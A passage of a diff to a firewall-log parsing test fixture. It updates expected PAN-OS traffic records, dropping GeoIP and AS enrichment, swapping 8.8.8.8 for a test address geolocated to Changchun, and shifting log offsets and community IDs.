"destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.386, - "destination.geo.location.lon": -122.0144, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "199.167.55.52", "destination.nat.ip": "199.167.55.52", "destination.nat.port": 4282, @@ -3680,7 +3572,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 15339, + "log.offset": 15519, "network.application": "incomplete", "network.bytes": 78, "network.community_id": [ 
@@ -3755,17 +3647,7 @@ "client.packets": 11, "client.port": 52516, "destination.address": "199.167.52.219", - "destination.as.number": 54538, - "destination.as.organization.name": "PALO ALTO NETWORKS", "destination.bytes": 2316, - "destination.geo.city_name": "Sunnyvale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.386, - "destination.geo.location.lon": -122.0144, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "199.167.52.219", "destination.nat.ip": "199.167.52.219", "destination.nat.port": 17472, @@ -3793,7 +3675,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 15808, + "log.offset": 15988, "network.application": "tanium", "network.bytes": 3402, "network.community_id": [ @@ -3868,17 +3750,7 @@ "client.packets": 19, "client.port": 52511, "destination.address": "52.71.117.196", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 13966, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "52.71.117.196", "destination.nat.ip": "52.71.117.196", "destination.nat.port": 443, @@ -3906,7 +3778,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 16297, + "log.offset": 16477, "network.application": "ssl", "network.bytes": 16594, "network.community_id": [ 
@@ -3980,17 +3852,18 @@ "client.nat.port": 34994, "client.packets": 1, "client.port": 3018, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 244, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -4004,7 +3877,7 @@ "event.end": "2018-11-30T16:09:12.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:12.000-02:00", "event.timezone": "-02:00", @@ -4016,12 +3889,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 16802, + "log.offset": 16982, "network.application": "dns", "network.bytes": 323, "network.community_id": [ - "1:b/0kdGUcINh0ryiR0w0QTg0t0jQ=", - "1:eI0W7/EQJgRBimA1ZM4XVOSKMqo=" + "1:dU0K6PPF6c/n+bJEBuJWSB9TvH4=", + "1:mWbN4QHKVTUC68wg5wKOivMQ8W8=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -4038,12 +3911,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24046", - "panw.panos.network.nat.community_id": "1:eI0W7/EQJgRBimA1ZM4XVOSKMqo=", + "panw.panos.network.nat.community_id": "1:dU0K6PPF6c/n+bJEBuJWSB9TvH4=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091148, "panw.panos.source.interface": "ethernet1/2", @@ -4058,14 +3931,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 244, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -4090,17 +3963,18 @@ "client.nat.port": 38064, "client.packets": 1, "client.port": 16569, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 205, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -4114,7 +3988,7 @@ "event.end": "2018-11-30T16:09:12.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:12.000-02:00", "event.timezone": "-02:00", @@ -4126,12 +4000,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 17250, + "log.offset": 17440, "network.application": "dns", "network.bytes": 300, "network.community_id": [ - "1:SsNvr7qdck7W52PZqREypGPIglo=", - "1:uSrPYHIl4eJpdC+J0IAMuGStuNc=" + "1:I02So92wktIGhyngyvODK1CjYE0=", + "1:MwQQDOUiYF37dHofLv1bDnJVK20=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -4148,12 +4022,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24196", - "panw.panos.network.nat.community_id": "1:uSrPYHIl4eJpdC+J0IAMuGStuNc=", + "panw.panos.network.nat.community_id": "1:MwQQDOUiYF37dHofLv1bDnJVK20=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091149, "panw.panos.source.interface": "ethernet1/2", @@ -4168,14 +4042,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 205, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -4201,17 +4075,7 @@ "client.packets": 24, "client.port": 52479, "destination.address": "35.186.194.41", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 2302, - "destination.geo.city_name": "Mountain View", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.4043, - "destination.geo.location.lon": -122.0748, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "35.186.194.41", "destination.nat.ip": "35.186.194.41", "destination.nat.port": 443, @@ -4239,7 +4103,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 17699, + "log.offset": 17899, "network.application": "ssl", "network.bytes": 6598, "network.community_id": [ 
@@ -4314,12 +4178,7 @@ "client.packets": 63, "client.port": 52478, "destination.address": "35.201.124.9", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 6757, - "destination.geo.continent_name": "Asia", - "destination.geo.location.lat": 35.0, - "destination.geo.location.lon": 105.0, "destination.ip": "35.201.124.9", "destination.nat.ip": "35.201.124.9", "destination.nat.port": 443, @@ -4347,7 +4206,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 18185, + "log.offset": 18385, "network.application": "ssl", "network.bytes": 65588, "network.community_id": [ @@ -4422,17 +4281,7 @@ "client.packets": 17, "client.port": 52502, "destination.address": "100.24.131.237", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 9007, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "100.24.131.237", "destination.nat.ip": "100.24.131.237", "destination.nat.port": 443, @@ -4460,7 +4309,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 18678, + "log.offset": 18878, "network.application": "ssl", "network.bytes": 13076, "network.community_id": [ 
@@ -4535,14 +4384,7 @@ "client.packets": 8, "client.port": 52458, "destination.address": "184.51.252.247", - "destination.as.number": 16625, - "destination.as.organization.name": "Akamai Technologies, Inc.", "destination.bytes": 661, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "184.51.252.247", "destination.nat.ip": "184.51.252.247", "destination.nat.port": 443, @@ -4570,7 +4412,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 19179, + "log.offset": 19379, "network.application": "ssl", "network.bytes": 1761, "network.community_id": [ @@ -4645,17 +4487,7 @@ "client.packets": 15, "client.port": 52484, "destination.address": "35.190.88.148", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 11136, - "destination.geo.city_name": "Mountain View", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.4043, - "destination.geo.location.lon": -122.0748, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "35.190.88.148", "destination.nat.ip": "35.190.88.148", "destination.nat.port": 443, @@ -4683,7 +4515,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 19683, + "log.offset": 19883, "network.application": "ssl", "network.bytes": 14732, "network.community_id": [ 
@@ -4758,17 +4590,7 @@ "client.packets": 15, "client.port": 52482, "destination.address": "35.186.243.83", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 11136, - "destination.geo.city_name": "Mountain View", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.4043, - "destination.geo.location.lon": -122.0748, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "35.186.243.83", "destination.nat.ip": "35.186.243.83", "destination.nat.port": 443, @@ -4796,7 +4618,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 20177, + "log.offset": 20377, "network.application": "ssl", "network.bytes": 14732, "network.community_id": [ 
@@ -4870,17 +4692,18 @@ "client.nat.port": 16044, "client.packets": 1, "client.port": 33769, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 182, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -4894,7 +4717,7 @@ "event.end": "2018-11-30T16:09:12.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:12.000-02:00", "event.timezone": "-02:00", @@ -4906,12 +4729,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 20671, + "log.offset": 20871, "network.application": "dns", "network.bytes": 266, "network.community_id": [ - "1:445AeHI1LAvb+ii4arRZeLAO4zM=", - "1:Y7iOj20be5Di4rx5iGHLO9k0YoU=" + "1:2lliaquecBpJntSuQ7PijiL4QZk=", + "1:8KuHdx0uKJL3qlKce34DQ08Axak=" ], "network.direction": "external", "network.packets": 2, 
@@ -4928,12 +4751,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24198", - "panw.panos.network.nat.community_id": "1:445AeHI1LAvb+ii4arRZeLAO4zM=", + "panw.panos.network.nat.community_id": "1:8KuHdx0uKJL3qlKce34DQ08Axak=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091156, "panw.panos.source.interface": "ethernet1/2", @@ -4948,14 +4771,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 182, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -4980,17 +4803,18 @@ "client.nat.port": 56614, "client.packets": 1, "client.port": 14106, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 90, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -5004,7 +4828,7 @@ "event.end": "2018-11-30T16:09:12.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:12.000-02:00", "event.timezone": "-02:00", @@ -5016,12 +4840,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 21122, + "log.offset": 21332, "network.application": "dns", "network.bytes": 164, "network.community_id": [ - "1:+5KwsEYW+tFecEENSBwHbKTvUv8=", - "1:8HlDMcJ2vfYtzQNW4/YDX7avDu8=" + "1:2lDBZAbLgBaDEDnigTknsVKKmwI=", + "1:QACuXO9c1p5aQqviOZwhIBygbzg=" ], "network.direction": "internal", "network.packets": 2, 
@@ -5038,12 +4862,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "trust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24184", - "panw.panos.network.nat.community_id": "1:+5KwsEYW+tFecEENSBwHbKTvUv8=", + "panw.panos.network.nat.community_id": "1:QACuXO9c1p5aQqviOZwhIBygbzg=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091157, "panw.panos.source.interface": "ethernet1/2", @@ -5058,14 +4882,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 90, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -5091,17 +4915,7 @@ "client.packets": 17, "client.port": 52503, "destination.address": "100.24.165.74", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 6669, - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "100.24.165.74", "destination.nat.ip": "100.24.165.74", "destination.nat.port": 443, @@ -5129,7 +4943,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 21568, + "log.offset": 21788, "network.application": "ssl", "network.bytes": 9400, "network.community_id": [ 
@@ -5204,14 +5018,7 @@ "client.packets": 8, "client.port": 52459, "destination.address": "184.51.252.247", - "destination.as.number": 16625, - "destination.as.organization.name": "Akamai Technologies, Inc.", "destination.bytes": 661, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "184.51.252.247", "destination.nat.ip": "184.51.252.247", "destination.nat.port": 443, @@ -5239,7 +5046,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 22066, + "log.offset": 22286, "network.application": "ssl", "network.bytes": 1761, "network.community_id": [ @@ -5314,12 +5121,7 @@ "client.packets": 15, "client.port": 52483, "destination.address": "35.201.94.140", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 11136, - "destination.geo.continent_name": "Asia", - "destination.geo.location.lat": 35.0, - "destination.geo.location.lon": 105.0, "destination.ip": "35.201.94.140", "destination.nat.ip": "35.201.94.140", "destination.nat.port": 443, @@ -5347,7 +5149,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 22571, + "log.offset": 22791, "network.application": "ssl", "network.bytes": 14732, "network.community_id": [ 
@@ -5421,17 +5223,18 @@ "client.nat.port": 0, "client.packets": 6, "client.port": 0, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 588, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 6, "destination.port": 0, 
@@ -5445,7 +5248,7 @@ "event.end": "2018-11-30T16:09:31.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:31.000-02:00", "event.timezone": "-02:00", @@ -5457,12 +5260,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 23072, + "log.offset": 23292, "network.application": "ping", "network.bytes": 1176, "network.community_id": [ - "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", - "1:iNhLzwoKKarTKCq59Sts/hhZN7Q=" + "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", + "1:P75WlJ7hfYMGDrg11tgcwQhxoAI=" ], "network.direction": "unknown", "network.packets": 12, 
@@ -5477,11 +5280,11 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 0, "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24390", - "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", + "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091161, "panw.panos.source.interface": "ethernet1/2", @@ -5495,14 +5298,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 6, "server.port": 0, 
@@ -5527,17 +5330,18 @@ "client.nat.port": 61722, "client.packets": 1, "client.port": 38663, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 144, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
